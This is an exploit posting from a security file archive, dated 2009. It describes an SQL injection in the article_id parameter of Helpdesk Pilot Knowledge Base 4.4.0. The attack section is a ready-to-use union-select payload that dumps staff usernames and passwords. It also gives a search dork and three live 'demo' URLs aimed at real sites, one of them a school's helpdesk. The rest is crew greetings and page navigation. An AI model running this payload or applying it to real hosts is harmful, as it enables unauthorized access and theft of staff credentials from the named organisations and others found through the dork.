exploit the possibilities

Helpdesk Pilot Knowledge Base SQL Injection

Helpdesk Pilot Knowledge Base SQL Injection
Posted Dec 30, 2009
Authored by kaMtiEz | Site indonesiancoder.com

Helpdesk Pilot Knowledge Base suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 3b174b1fc8baf67ffd30d206fe5e0895

Helpdesk Pilot Knowledge Base SQL Injection

Change Mirror Download
#############################################################################
#
[~] Helpdesk Pilot Knowledge Base SQL injection vulnerability - (article_id)#
[~] Author : kaMtiEz (kamzcrew@gmail.com) #
[~] Homepage : http://www.indonesiancoder.com #
[~] Date : Desember 29, 2009 #
#
#############################################################################

[ Software Information ]

[+] Vendor : http://www.helpdeskpilot.com/
[+] Download : -
[+] version : 4.4.0 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : 1. Standard = $299.95
2. Professional = $399.95
3. Corporate = $499.95
[+] Location : INDONESIA - JOGJA

#############################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/knowledgebase.php?act=art&article_id=[INDONESIANCODER]

[ Exploit ]

-666+union+select+concat_ws(0x3a,staff_username,staff_password)+from+hdp_staff--

[ Demo ]

http://www.helpdeskpilot.com/demo/knowledgebase.php?act=art&article_id=-666+union+select+concat_ws(0x3a,staff_username,staff_password)+from+demo430_staff--

http://kb.helpdeskpilot.com/knowledgebase.php?act=art&article_id=-666+union+select+concat_ws%280x3a,staff_username,staff_password%29+from+hdp_staff--

http://www.blendedschools.net/helpdesk/knowledgebase.php?act=art&article_id=-666+union+select+concat_ws(0x3a,staff_username,staff_password)+from+hdp_staff--
===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,cimpli
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] mungkinkah semua yang dulu tlah datang menghilang ku terus bertanya engkau dimana
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D

[ QUOTE ]

[+] HAPPY NEW YEAR ^_^
[+] Welcome 2010 .. lets r0x !
[+] Tukulesto : lets make it better ,, soon .. :P~~

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    8 Files
  • 2
    Jan 2nd
    11 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    2 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    18 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    10 Files
  • 10
    Jan 10th
    13 Files
  • 11
    Jan 11th
    2 Files
  • 12
    Jan 12th
    4 Files
  • 13
    Jan 13th
    21 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    12 Files
  • 16
    Jan 16th
    18 Files
  • 17
    Jan 17th
    11 Files
  • 18
    Jan 18th
    3 Files
  • 19
    Jan 19th
    2 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    21 Files
  • 22
    Jan 22nd
    19 Files
  • 23
    Jan 23rd
    19 Files
  • 24
    Jan 24th
    8 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close